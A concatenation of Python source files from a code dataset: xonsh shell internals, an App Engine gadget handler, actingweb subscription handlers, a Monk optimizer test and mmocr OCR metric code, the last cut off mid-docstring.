stdbuf : BytesIO-like or StringIO-like
The std stream buffer.
membuf : BytesIO-like
The in memory stream buffer.
encoding : str or None, optional
The encoding of the stream. Only used if stdbuf is a text stream,
rather than a binary one. Defaults to $XONSH_ENCODING if None.
errors : str or None, optional
The error form for the encoding of the stream. Only used if stdbuf
is a text stream, rather than a binary one. Deafults to
$XONSH_ENCODING_ERRORS if None.
prestd : bytes, optional
The prefix to prepend to the standard buffer.
poststd : bytes, optional
The postfix to append to the standard buffer.
"""
self.stdbuf = stdbuf
self.membuf = membuf
env = builtins.__xonsh__.env
self.encoding = env.get("XONSH_ENCODING") if encoding is None else encoding
self.errors = env.get("XONSH_ENCODING_ERRORS") if errors is None else errors
self.prestd = prestd
self.poststd = poststd
self._std_is_binary = (not hasattr(stdbuf, "encoding")) or hasattr(
stdbuf, "_redirect_to"
) # VS Code terminal window - has encoding attr but won't accept str
def fileno(self):
"""Returns the file descriptor of the std buffer."""
return self.stdbuf.fileno()
def seek(self, offset, whence=io.SEEK_SET):
"""Sets the location in both the stdbuf and the membuf."""
self.stdbuf.seek(offset, whence)
self.membuf.seek(offset, whence)
def truncate(self, size=None):
"""Truncate both buffers."""
self.stdbuf.truncate(size)
self.membuf.truncate(size)
def readinto(self, b):
"""Read bytes into buffer from both streams."""
if self._std_is_binary:
self.stdbuf.readinto(b)
return self.membuf.readinto(b)
def write(self, b):
"""Write bytes into both buffers."""
std_b = b
if self.prestd:
std_b = self.prestd + b
if self.poststd:
std_b += self.poststd
# write to stdbuf
if self._std_is_binary:
self.stdbuf.write(std_b)
else:
self.stdbuf.write(std_b.decode(encoding=self.encoding, errors=self.errors))
return self.membuf.write(b)
class _TeeStd(io.TextIOBase):
"""Tees a std stream into an in-memory container and the original stream."""
def __init__(self, name, mem, prestd="", poststd=""):
"""
Parameters
----------
name : str
The name of the buffer in the sys module, e.g. 'stdout'.
mem : io.TextIOBase-like
The in-memory text-based representation.
prestd : str, optional
The prefix to prepend to the standard stream.
poststd : str, optional
The postfix to append to the standard stream.
"""
self._name = name
self.std = std = getattr(sys, name)
self.mem = mem
self.prestd = prestd
self.poststd = poststd
preb = prestd.encode(encoding=mem.encoding, errors=mem.errors)
postb = poststd.encode(encoding=mem.encoding, errors=mem.errors)
if hasattr(std, "buffer"):
buffer = _TeeStdBuf(std.buffer, mem.buffer, prestd=preb, poststd=postb)
else:
# TextIO does not have buffer as part of the API, so std streams
# may not either.
buffer = _TeeStdBuf(
std,
mem.buffer,
encoding=mem.encoding,
errors=mem.errors,
prestd=preb,
poststd=postb,
)
self.buffer = buffer
setattr(sys, name, self)
@property
def encoding(self):
"""The encoding of the in-memory buffer."""
return self.mem.encoding
@property
def errors(self):
"""The errors of the in-memory buffer."""
return self.mem.errors
@property
def newlines(self):
"""The newlines of the in-memory buffer."""
return self.mem.newlines
def _replace_std(self):
std = self.std
if std is None:
return
setattr(sys, self._name, std)
self.std = self._name = None
def __del__(self):
self._replace_std()
def close(self):
"""Restores the original std stream."""
self._replace_std()
def write(self, s):
"""Writes data to the original std stream and the in-memory object."""
self.mem.write(s)
if self.std is None:
return
std_s = s
if self.prestd:
std_s = self.prestd + std_s
if self.poststd:
std_s += self.poststd
self.std.write(std_s)
def flush(self):
"""Flushes both the original stdout and the buffer."""
self.std.flush()
self.mem.flush()
def fileno(self):
"""Tunnel fileno() calls to the std stream."""
return self.std.fileno()
def seek(self, offset, whence=io.SEEK_SET):
"""Seek to a location in both streams."""
self.std.seek(offset, whence)
self.mem.seek(offset, whence)
def truncate(self, size=None):
"""Seek to a location in both streams."""
self.std.truncate(size)
self.mem.truncate(size)
def detach(self):
"""This operation is not supported."""
raise io.UnsupportedOperation
def read(self, size=None):
"""Read from the in-memory stream and seek to a new location in the
std stream.
"""
s = self.mem.read(size)
loc = self.std.tell()
self.std.seek(loc + len(s))
return s
def readline(self, size=-1):
"""Read a line from the in-memory stream and seek to a new location
in the std stream.
"""
s = self.mem.readline(size)
loc = self.std.tell()
self.std.seek(loc + len(s))
return s
def isatty(self) -> bool:
"""delegate the method to the underlying io-wrapper"""
if self.std: # it happens to be reset sometimes
return self.std.isatty()
return super().isatty()
class Tee:
"""Class that merges tee'd stdout and stderr into a single stream.
This represents what a user would actually see on the command line.
This class has the same interface as io.TextIOWrapper, except that
the buffer is optional.
"""
# pylint is a stupid about counting public methods when using inheritance.
# pylint: disable=too-few-public-methods
def __init__(
self,
buffer=None,
encoding=None,
errors=None,
newline=None,
line_buffering=False,
write_through=False,
):
self.buffer = io.BytesIO() if buffer is None else buffer
self.memory = io.TextIOWrapper(
self.buffer,
encoding=encoding,
errors=errors,
newline=newline,
line_buffering=line_buffering,
write_through=write_through,
)
self.stdout = _TeeStd("stdout", self.memory)
env = builtins.__xonsh__.env
prestderr = format_std_prepost(env.get("XONSH_STDERR_PREFIX"))
poststderr = format_std_prepost(env.get("XONSH_STDERR_POSTFIX"))
self.stderr = _TeeStd(
"stderr", self.memory, prestd=prestderr, poststd=poststderr
)
@property
def line_buffering(self):
return self.memory.line_buffering
def __del__(self):
del self.stdout, self.stderr
self.stdout = self.stderr = None
def close(self):
"""Closes the buffer as well as the stdout and stderr tees."""
self.stdout.close()
self.stderr.close()
self.memory.close()
def getvalue(self):
"""Gets the current contents of the in-memory buffer."""
m = self.memory
loc = m.tell()
m.seek(0)
s = m.read()
m.seek(loc)
return s
class BaseShell(object):
"""The xonsh shell."""
def __init__(self, execer, ctx, **kwargs):
super().__init__()
self.execer = execer
self.ctx = ctx
self.completer = Completer() if kwargs.get("completer", True) else None
self.buffer = []
self.need_more_lines = False
self.src_starts_with_space = False
self.mlprompt = None
self._styler = DefaultNotGiven
self.prompt_formatter = PromptFormatter()
self.accumulated_inputs = ""
@property
def styler(self):
if self._styler is DefaultNotGiven:
if HAS_PYGMENTS:
from xonsh.pyghooks import XonshStyle
env = builtins.__xonsh__.env
self._styler = XonshStyle(env.get("XONSH_COLOR_STYLE"))
else:
self._styler = None
return self._styler
@styler.setter
def styler(self, value):
self._styler = value
@styler.deleter
def styler(self):
self._styler = DefaultNotGiven
def emptyline(self):
"""Called when an empty line has been entered."""
self.need_more_lines = False
self.default("")
def singleline(self, **kwargs):
"""Reads a single line of input from the shell."""
msg = "{0} has not implemented singleline()."
raise RuntimeError(msg.format(self.__class__.__name__))
def precmd(self, line):
"""Called just before execution of line."""
return line if self.need_more_lines else line.lstrip()
def default(self, line, raw_line=None):
"""Implements code execution."""
line = line if line.endswith("\n") else line + "\n"
if not self.need_more_lines: # this is the first line
if not raw_line:
self.src_starts_with_space = False
else:
self.src_starts_with_space = raw_line[0].isspace()
src, code = self.push(line)
if code is None:
return
events.on_precommand.fire(cmd=src)
env = builtins.__xonsh__.env
hist = builtins.__xonsh__.history # pylint: disable=no-member
ts1 = None
enc = env.get("XONSH_ENCODING")
err = env.get("XONSH_ENCODING_ERRORS")
tee = Tee(encoding=enc, errors=err)
try:
ts0 = time.time()
run_compiled_code(code, self.ctx, None, "single")
ts1 = time.time()
if hist is not None and hist.last_cmd_rtn is None:
hist.last_cmd_rtn = 0 # returncode for success
except XonshError as e:
print(e.args[0], file=sys.stderr)
if hist is not None and hist.last_cmd_rtn is None:
hist.last_cmd_rtn = 1 # return code for failure
except Exception: # pylint: disable=broad-except
print_exception()
if hist is not None and hist.last_cmd_rtn is None:
hist.last_cmd_rtn = 1 # return code for failure
finally:
ts1 = ts1 or time.time()
tee_out = tee.getvalue()
self._append_history(
inp=src,
ts=[ts0, ts1],
spc=self.src_starts_with_space,
tee_out=tee_out,
)
self.accumulated_inputs += src
if (
tee_out
and env.get("XONSH_APPEND_NEWLINE")
and not tee_out.endswith(os.linesep)
):
print(os.linesep, end="")
tee.close()
self._fix_cwd()
if builtins.__xonsh__.exit: # pylint: disable=no-member
return True
def _append_history(self, tee_out=None, **info):
"""Append information about the command to the history.
This also handles on_postcommand because this is the place where all the
information is available.
"""
hist = builtins.__xonsh__.history # pylint: disable=no-member
info["rtn"] = hist.last_cmd_rtn if hist is not None else None
tee_out = tee_out or None
last_out = hist.last_cmd_out if hist is not None else None
if last_out is None and tee_out is None:
pass
elif last_out is None and tee_out is not None:
info["out"] = tee_out
elif last_out is not None and tee_out is None:
info["out"] = last_out
else:
info["out"] = tee_out + "\n" + last_out
events.on_postcommand.fire(
cmd=info["inp"], rtn=info["rtn"], out=info.get("out", None), ts=info["ts"]
)
if hist is not None:
hist.append(info)
hist.last_cmd_rtn = hist.last_cmd_out = None
def _fix_cwd(self):
"""Check if the cwd changed out from under us."""
env = builtins.__xonsh__.env
try:
cwd = os.getcwd()
except (FileNotFoundError, OSError):
cwd = None
if cwd is None:
# directory has been deleted out from under us, most likely
pwd = env.get("PWD", None)
if pwd is None:
# we have no idea where we are
env["PWD"] = "<invalid directory>"
elif os.path.isdir(pwd):
# unclear why os.getcwd() failed. do nothing.
pass
else:
# OK PWD is really gone.
msg = "{UNDERLINE_INTENSE_WHITE}{BACKGROUND_INTENSE_BLACK}"
msg += "xonsh: working directory does not exist: " + pwd
msg += "{RESET}"
self.print_color(msg, file=sys.stderr)
elif "PWD" not in env:
# $PWD is missing from env, recreate it
env["PWD"] = cwd
elif os.path.realpath(cwd) != os.path.realpath(env["PWD"]):
# The working directory has changed without updating $PWD, fix this
old = env["PWD"]
env["PWD"] = cwd
env["OLDPWD"] = old
events.on_chdir.fire(olddir=old, newdir=cwd)
def push(self, line):
"""Pushes a line onto the buffer and compiles the code in a way that
enables multiline input.
"""
self.buffer.append(line)
if self.need_more_lines:
return None, None
src = "".join(self.buffer)
src = transform_command(src)
return self.compile(src)
def compile(self, src):
"""Compiles source code and returns the (possibly modified) source and
a valid code object.
"""
_cache = should_use_cache(self.execer, "single")
if _cache:
codefname = code_cache_name(src)
cachefname = get_cache_filename(codefname, code=True)
usecache, code = code_cache_check(cachefname)
if usecache:
self.reset_buffer()
return src, code
lincont = get_line_continuation()
if src.endswith(lincont + "\n"):
self.need_more_lines = True
return src, None
try:
code = self.execer.compile(src, mode="single", glbs=self.ctx, locs=None)
if _cache:
update_cache(code, cachefname)
self.reset_buffer()
except SyntaxError:
partial_string_info = check_for_partial_string(src)
in_partial_string = (
partial_string_info[0] is not None and partial_string_info[1] is None
)
if (src == "\n" or src.endswith("\n\n")) and not in_partial_string:
self.reset_buffer()
print_exception()
return src, None
self.need_more_lines = True
code = None
except Exception: # pylint: disable=broad-except
self.reset_buffer()
print_exception()
code = None
return src, code
def reset_buffer(self):
"""Resets the line buffer."""
self.buffer.clear()
self.need_more_lines = False
self.mlprompt = None
def settitle(self):
"""Sets terminal title."""
env = builtins.__xonsh__.env # pylint: disable=no-member
term = env.get("TERM", None)
# Shells running in emacs sets TERM to "dumb" or "eterm-color".
# Do not set title for these to avoid garbled prompt.
if (term is None and not ON_WINDOWS) or term in [
"dumb",
"eterm-color",
"linux",
]:
return
t = env.get("TITLE")
if t is None:
return
t = self.prompt_formatter(t)
if ON_WINDOWS and "ANSICON" not in env:
kernel32.SetConsoleTitleW(t)
else:
with open(1, "wb", closefd=False) as f:
# prevent xonsh from answering interactive questions
# on the next command by writing the title
f.write("\x1b]0;{0}\x07".format(t).encode())
f.flush()
@property
def prompt(self):
"""Obtains the current prompt string."""
if self.need_more_lines:
if self.mlprompt is None:
try:
self.mlprompt = multiline_prompt()
except Exception: # pylint: disable=broad-except
print_exception()
self.mlprompt = "<multiline prompt error> "
return self.mlprompt
env = builtins.__xonsh__.env # pylint: disable=no-member
p = env.get("PROMPT")
try:
p = self.prompt_formatter(p)
except Exception: # pylint: disable=broad-except
print_exception()
self.settitle()
return p
def format_color(self, string, hide=False, force_string=False, **kwargs):
"""Formats the colors in a string. ``BaseShell``'s default implementation
of this method uses colors based on ANSI color codes.
"""
style = builtins.__xonsh__.env.get("XONSH_COLOR_STYLE")
return ansi_partial_color_format(string, hide=hide, style=style)
def print_color(self, string, hide=False, **kwargs):
"""Prints a string in color. This base implementation's colors are based
on ANSI color codes if a string was given as input. If a list of token
pairs is given, it will color based on pygments, if available. If
pygments is not available, it will print a colorless string.
"""
if isinstance(string, str):
s = self.format_color(string, hide=hide)
elif HAS_PYGMENTS:
# assume this is a list of (Token, str) tuples and format it
env = builtins.__xonsh__.env
self.styler.style_name = env.get("XONSH_COLOR_STYLE")
style_proxy = pyghooks.xonsh_style_proxy(self.styler)
formatter = pyghooks.XonshTerminal256Formatter(style=style_proxy)
s = pygments.format(string, formatter).rstrip()
else:
# assume this is a list of (Token, str) tuples and remove color
s = "".join([x for _, x in string])
print(s, **kwargs)
def color_style_names(self):
"""Returns an iterable of all available style names."""
return ()
def color_style(self):
"""Returns the current color map."""
return {}
def restore_tty_sanity(self):
"""An interface for resetting the TTY stdin mode. This is highly
dependent on the shell backend. Also it is mostly optional since
it only affects ^Z backgrounding behaviour.
"""
pass
| 34.401653 | 87 | 0.583001 |
5ce76ec1b408fa9703e3a3c2eaca22000db707c4 | 1,366 | py | Python | appengine/voter-info-gadget.py | geary/election-gadgets.egypt-staging | 80a8349cfea79a44af6ca123c190658b661b9fed | [
"Unlicense"
] | null | null | null | appengine/voter-info-gadget.py | geary/election-gadgets.egypt-staging | 80a8349cfea79a44af6ca123c190658b661b9fed | [
"Unlicense"
] | null | null | null | appengine/voter-info-gadget.py | geary/election-gadgets.egypt-staging | 80a8349cfea79a44af6ca123c190658b661b9fed | [
"Unlicense"
] | null | null | null | #print 'Content-Type: application/xml'
#print ''
#
#f = open( 'voter-info-gadget.xml', 'r' )
#xml = f.read()
#f.close()
#
#print xml
#import re
#from pprint import pformat, pprint
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
#def dumpRequest( req ):
# return pformat({
# 'environ': req.environ,
# 'url': req.url,
# 'headers': req.headers,
# })
#def addDump( xml, req ):
# dr = dumpRequest( req )
# dr = re.sub( r'\}', '\n}', dr )
# dr = re.sub( r"'wsgi[^\n]+\n", '', dr )
# dr = re.sub ( r'\n\s*', ' ', dr )
# dr = re.sub ( r',\s*\}', '}', dr )
# return xml.replace( 'var opt =', 'alert( (' + dr + ').toSource() );\n\n\tvar opt =' ) # poor man's template
class GadgetHandler( webapp.RequestHandler ):
def get( self, dump, debug ):
self.response.headers['Content-Type'] = 'application/xml'
if debug == None: debug = ''
f = open( 'voter-info-gadget-egypt.xml', 'r' )
xml = f.read()
f.close()
xml = xml.replace( '{{debug}}', debug ) # poor man's template
#if dump:
# xml = addDump( xml, self.request )
self.response.out.write( xml )
application = webapp.WSGIApplication([
( r'/(dump-)?(.+)?voter-info-gadget-egypt\.xml', GadgetHandler )
], debug = True )
def main():
run_wsgi_app( application )
if __name__ == '__main__':
main()
| 26.269231 | 111 | 0.589312 |
69ead8fcd0b4db0e2eae00deec59f0c82ff12184 | 15,078 | py | Python | actingweb/handlers/subscription.py | gregertw/actingweb | e1c8f66451f547c920c64c4e2a702698e3a0d299 | [
"BSD-3-Clause"
] | null | null | null | actingweb/handlers/subscription.py | gregertw/actingweb | e1c8f66451f547c920c64c4e2a702698e3a0d299 | [
"BSD-3-Clause"
] | null | null | null | actingweb/handlers/subscription.py | gregertw/actingweb | e1c8f66451f547c920c64c4e2a702698e3a0d299 | [
"BSD-3-Clause"
] | null | null | null | from builtins import str
import json
import logging
from actingweb import auth
from actingweb.handlers import base_handler
class SubscriptionRootHandler(base_handler.BaseHandler):
"""Handles requests to /subscription"""
def get(self, actor_id):
if self.request.get('_method') == 'POST':
self.post(actor_id)
return
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', method='GET'):
self.response.set_status(403)
return
peerid = self.request.get('peerid')
target = self.request.get('target')
subtarget = self.request.get('subtarget')
resource = self.request.get('resource')
subscriptions = myself.get_subscriptions(peerid=peerid, target=target, subtarget=subtarget, resource=resource)
if not subscriptions:
self.response.set_status(404, 'Not found')
return
data = {
'id': myself.id,
'data': subscriptions,
}
out = json.dumps(data)
self.response.write(out)
self.response.headers["Content-Type"] = "application/json"
self.response.set_status(200, 'Ok')
def post(self, actor_id):
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', method='POST'):
self.response.set_status(403)
return
try:
params = json.loads(self.request.body.decode('utf-8', 'ignore'))
if 'peerid' in params:
peerid = params['peerid']
else:
peerid = None
if 'target' in params:
target = params['target']
else:
target = None
if 'subtarget' in params:
subtarget = params['subtarget']
else:
subtarget = None
if 'resource' in params:
resource = params['resource']
else:
resource = None
if 'granularity' in params:
granularity = params['granularity']
else:
granularity = 'none'
except ValueError:
peerid = self.request.get('peerid')
target = self.request.get('target')
subtarget = self.request.get('subtarget')
resource = self.request.get('resource')
granularity = self.request.get('granularity')
if not peerid or len(peerid) == 0:
self.response.set_status(400, 'Missing peer URL')
return
if not target or len(target) == 0:
self.response.set_status(400, 'Missing target')
return
remote_loc = myself.create_remote_subscription(
peerid=peerid, target=target, subtarget=subtarget, resource=resource, granularity=granularity)
if not remote_loc:
self.response.set_status(408, 'Unable to create remote subscription with peer')
return
self.response.headers["Location"] = remote_loc
self.response.set_status(204, 'Created')
# Handling requests to /subscription/*, e.g. /subscription/<peerid>
class SubscriptionRelationshipHandler(base_handler.BaseHandler):
def get(self, actor_id, peerid):
if self.request.get('_method') == 'POST':
self.post(actor_id, peerid)
return
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', method='GET', peerid=peerid):
self.response.set_status(403)
return
target = self.request.get('target')
subtarget = self.request.get('subtarget')
resource = self.request.get('resource')
subscriptions = myself.get_subscriptions(peerid=peerid, target=target, subtarget=subtarget, resource=resource)
if not subscriptions:
self.response.set_status(404, 'Not found')
return
data = {
'id': myself.id,
'peerid': peerid,
'data': subscriptions,
}
out = json.dumps(data)
self.response.write(out)
self.response.headers["Content-Type"] = "application/json"
self.response.set_status(200, 'Ok')
def post(self, actor_id, peerid):
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', subpath='<id>', method='POST', peerid=peerid):
self.response.set_status(403)
return
try:
params = json.loads(self.request.body.decode('utf-8', 'ignore'))
if 'target' in params:
target = params['target']
else:
self.response.set_status(400, 'No target in request')
return
if 'subtarget' in params:
subtarget = params['subtarget']
else:
subtarget = None
if 'resource' in params:
resource = params['resource']
else:
resource = None
if 'granularity' in params:
granularity = params['granularity']
else:
granularity = 'none'
except ValueError:
self.response.set_status(400, 'No json body')
return
if peerid != check.acl["peerid"]:
logging.warning("Peer " + peerid +
" tried to create a subscription for peer " + check.acl["peerid"])
self.response.set_status(403, 'Forbidden. Wrong peer id in request')
return
# We need to validate that this peer has GET rights on what it wants to subscribe to
if not check.check_authorisation(path=target, subpath=subtarget, method='GET', peerid=peerid):
self.response.set_status(403)
return
new_sub = myself.create_subscription(
peerid=check.acl["peerid"], target=target, subtarget=subtarget, resource=resource, granularity=granularity)
if not new_sub:
self.response.set_status(500, 'Unable to create new subscription')
return
self.response.headers["Location"] = str(self.config.root +
myself.id + '/subscriptions/' + new_sub["peerid"] +
'/' + new_sub["subscriptionid"])
pair = {
'subscriptionid': new_sub["subscriptionid"],
'target': new_sub["target"],
'subtarget': new_sub["subtarget"],
'resource': new_sub["resource"],
'granularity': new_sub["granularity"],
'sequence': new_sub["sequence"],
}
out = json.dumps(pair)
self.response.write(out)
self.response.headers["Content-Type"] = "application/json"
self.response.set_status(201, 'Created')
class SubscriptionHandler(base_handler.BaseHandler):
""" Handling requests to specific subscriptions, e.g. /subscriptions/<peerid>/12f2ae53bd"""
def get(self, actor_id, peerid, subid):
if self.request.get('_method') == 'PUT':
self.put(actor_id, peerid, subid)
return
if self.request.get('_method') == 'DELETE':
self.delete(actor_id, peerid, subid)
return
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
subpath=peerid + '/' + subid,
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
self.response.set_status(403)
return
sub = myself.get_subscription_obj(peerid=peerid, subid=subid)
sub_data = sub.get()
if not sub_data or len(sub_data) == 0:
self.response.set_status(404, "Subscription does not exist")
return
diffs = sub.get_diffs()
pairs = []
for diff in diffs:
try:
d = json.loads(diff["diff"])
except (TypeError, ValueError, KeyError):
d = diff["diff"]
pairs.append({
'sequence': diff["sequence"],
'timestamp': diff["timestamp"].strftime('%Y-%m-%dT%H:%M:%S.%fZ'),
'data': d,
})
if len(pairs) == 0:
self.response.set_status(404, 'No diffs available')
return
data = {
'id': myself.id,
'peerid': peerid,
'subscriptionid': subid,
'target': sub_data["target"],
'subtarget': sub_data["subtarget"],
'resource': sub_data["resource"],
'data': pairs,
}
out = json.dumps(data)
self.response.write(out)
self.response.headers["Content-Type"] = "application/json"
self.response.set_status(200, 'Ok')
def put(self, actor_id, peerid, subid):
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
subpath=peerid + '/' + subid,
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
self.response.set_status(403)
return
try:
params = json.loads(self.request.body.decode('utf-8', 'ignore'))
if 'sequence' in params:
seq = params['sequence']
else:
self.response.set_status(400, "Error in json body and no GET parameters")
return
except (TypeError, ValueError, KeyError):
seq = self.request.get('sequence')
if len(seq) == 0:
self.response.set_status(400, "Error in json body and no GET parameters")
return
try:
if not isinstance(seq, int):
seqnr = int(seq)
else:
seqnr = seq
except ValueError:
self.response.set_status(400, "Sequence does not contain a number")
return
sub = myself.get_subscription_obj(peerid=peerid, subid=subid)
if not sub:
self.response.set_status(404, "Subscription does not exist")
return
sub.clear_diffs(seqnr=seqnr)
self.response.set_status(204)
return
def delete(self, actor_id, peerid, subid):
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
subpath=peerid + '/' + subid,
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
self.response.set_status(403)
return
# Do not delete remote subscription if this is from our peer
if len(check.acl['peerid']) == 0:
myself.delete_remote_subscription(peerid=peerid, subid=subid)
if not myself.delete_subscription(peerid=peerid, subid=subid):
self.response.set_status(404)
return
self.response.set_status(204)
return
class SubscriptionDiffHandler(base_handler.BaseHandler):
""" Handling requests to specific diffs for one subscription and clears it, e.g.
/subscriptions/<peerid>/<subid>/112"""
def get(self, actor_id, peerid, subid, seqnr):
(myself, check) = auth.init_actingweb(appreq=self,
actor_id=actor_id,
path='subscriptions',
subpath=peerid + '/' + subid + '/' + str(seqnr),
config=self.config)
if not myself or check.response["code"] != 200:
return
if not check.check_authorisation(path='subscriptions', subpath='<id>/<id>', method='GET', peerid=peerid):
self.response.set_status(403)
return
sub = myself.get_subscription_obj(peerid=peerid, subid=subid)
sub_data = sub.get()
if not sub:
self.response.set_status(404, "Subscription does not exist")
return
if not isinstance(seqnr, int):
seqnr = int(seqnr)
diff = sub.get_diff(seqnr=seqnr)
if not diff:
self.response.set_status(404, 'No diffs available')
return
try:
d = json.loads(diff["data"])
except (TypeError, ValueError, KeyError):
d = diff["data"]
pairs = {
'id': myself.id,
'peerid': peerid,
'subscriptionid': subid,
'timestamp': diff["timestamp"].strftime('%Y-%m-%dT%H:%M:%S.%fZ'),
'target': sub_data["target"],
'subtarget': sub_data["subtarget"],
'resource': sub_data["resource"],
'sequence': seqnr,
'data': d,
}
sub.clear_diff(seqnr)
out = json.dumps(pairs)
self.response.write(out)
self.response.headers["Content-Type"] = "application/json"
self.response.set_status(200, 'Ok')
| 42.835227 | 119 | 0.523544 |
20e2f9eddb46477dd57563222eac66cbd1d46830 | 1,251 | py | Python | monk/system_unit_tests/pytorch/test_optimizer_adamax.py | Shreyashwaghe/monk_v1 | 4ee4d9483e8ffac9b73a41f3c378e5abf5fc799b | [
"Apache-2.0"
] | 7 | 2020-07-26T08:37:29.000Z | 2020-10-30T10:23:11.000Z | monk/system_unit_tests/pytorch/test_optimizer_adamax.py | mursalfk/monk_v1 | 62f34a52f242772186ffff7e56764e958fbcd920 | [
"Apache-2.0"
] | 9 | 2020-01-28T21:40:39.000Z | 2022-02-10T01:24:06.000Z | monk/system_unit_tests/pytorch/test_optimizer_adamax.py | mursalfk/monk_v1 | 62f34a52f242772186ffff7e56764e958fbcd920 | [
"Apache-2.0"
] | 1 | 2020-10-07T12:57:44.000Z | 2020-10-07T12:57:44.000Z | import os
import sys
sys.path.append("../../../monk/");
import psutil
from pytorch_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
def test_optimizer_adamax(system_dict):
forward = True;
test = "test_optimizer_adamax";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
gtf = prototype(verbose=0);
gtf.Prototype("sample-project-1", "sample-experiment-1");
gtf.Default(dataset_path="../../system_check_tests/datasets/dataset_cats_dogs_train",
model_name="resnet18", freeze_base_network=True, num_epochs=2);
gtf.optimizer_adamax(0.01, weight_decay=0.0001, beta1=0.9, beta2=0.999);
gtf.Train();
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
return system_dict
| 32.921053 | 98 | 0.64988 |
86973fd76bef29874d88f521cfbfb2e4054e46ec | 5,727 | py | Python | mmocr/core/evaluation/ocr_metric.py | zezeze97/image2latex | c745667cd1af91dbff2385dcf2f2b80b9a40adb6 | [
"Apache-2.0"
] | 4 | 2022-01-03T06:52:30.000Z | 2022-01-17T02:30:25.000Z | mmocr/core/evaluation/ocr_metric.py | zezeze97/image2latex | c745667cd1af91dbff2385dcf2f2b80b9a40adb6 | [
"Apache-2.0"
] | null | null | null | mmocr/core/evaluation/ocr_metric.py | zezeze97/image2latex | c745667cd1af91dbff2385dcf2f2b80b9a40adb6 | [
"Apache-2.0"
] | 1 | 2021-12-31T04:47:16.000Z | 2021-12-31T04:47:16.000Z | import re
from difflib import SequenceMatcher
from rapidfuzz import string_metric
from nltk.translate.bleu_score import sentence_bleu
import numpy as np
def cal_true_positive_char(pred, gt):
"""Calculate correct character number in prediction.
Args:
pred (str): Prediction text.
gt (str): Ground truth text.
Returns:
true_positive_char_num (int): The true positive number.
"""
all_opt = SequenceMatcher(None, pred, gt)
true_positive_char_num = 0
for opt, _, _, s2, e2 in all_opt.get_opcodes():
if opt == 'equal':
true_positive_char_num += (e2 - s2)
else:
pass
return true_positive_char_num
def count_matches(pred_texts, gt_texts):
"""Count the various match number for metric calculation.
Args:
pred_texts (list[str]): Predicted text string.
gt_texts (list[str]): Ground truth text string.
Returns:
match_res: (dict[str: int]): Match number used for
metric calculation.
"""
match_res = {
'gt_char_num': 0,
'pred_char_num': 0,
'true_positive_char_num': 0,
'gt_word_num': 0,
'match_word_num': 0,
'match_word_ignore_case': 0,
'match_word_ignore_case_symbol': 0,
'bleu':0
}
comp = re.compile('[^A-Z^a-z^0-9^\u4e00-\u9fa5]')
norm_ed_sum = 0.0;bleu_score = []
for pred_text, gt_text in zip(pred_texts, gt_texts):
current_bleu = sentence_bleu([gt_text], pred_text)
bleu_score.append(current_bleu)
pred_text_str = ''
for item in pred_text:
toeken = item + ' '
pred_text_str += toeken
gt_text_str = ''
for item in gt_text:
toeken = item + ' '
gt_text_str += toeken
pred_text = pred_text_str
gt_text = gt_text_str
if gt_text == pred_text:
match_res['match_word_num'] += 1
gt_text_lower = gt_text.lower()
pred_text_lower = pred_text.lower()
if gt_text_lower == pred_text_lower:
match_res['match_word_ignore_case'] += 1
else:
print('*'*60)
print('Pred : {}'.format(pred_text_lower))
print('GtGt : {}'.format(gt_text_lower))
print('BLEU: {}'.format(current_bleu))
gt_text_lower_ignore = comp.sub('', gt_text_lower)
pred_text_lower_ignore = comp.sub('', pred_text_lower)
if gt_text_lower_ignore == pred_text_lower_ignore:
match_res['match_word_ignore_case_symbol'] += 1
match_res['gt_word_num'] += 1
# normalized edit distance
edit_dist = string_metric.levenshtein(pred_text_lower_ignore,
gt_text_lower_ignore)
norm_ed = float(edit_dist) / max(1, len(gt_text_lower_ignore),
len(pred_text_lower_ignore))
norm_ed_sum += norm_ed
# number to calculate char level recall & precision
match_res['gt_char_num'] += len(gt_text_lower_ignore)
match_res['pred_char_num'] += len(pred_text_lower_ignore)
true_positive_char_num = cal_true_positive_char(
pred_text_lower_ignore, gt_text_lower_ignore)
match_res['true_positive_char_num'] += true_positive_char_num
normalized_edit_distance = norm_ed_sum / max(1, len(gt_texts))
match_res['ned'] = normalized_edit_distance
match_res['bleu'] = np.mean(bleu_score)
return match_res
def eval_ocr_metric(pred_texts, gt_texts):
"""Evaluate the text recognition performance with metric: word accuracy and
1-N.E.D. See https://rrc.cvc.uab.es/?ch=14&com=tasks for details.
Args:
pred_texts (list[str]): Text strings of prediction.
gt_texts (list[str]): Text strings of ground truth.
Returns:
eval_res (dict[str: float]): Metric dict for text recognition, include:
- word_acc: Accuracy in word level.
- word_acc_ignore_case: Accuracy in word level, ignore letter case.
- word_acc_ignore_case_symbol: Accuracy in word level, ignore
letter case and symbol. (default metric for
academic evaluation)
- char_recall: Recall in character level, ignore
letter case and symbol.
- char_precision: Precision in character level, ignore
letter case and symbol.
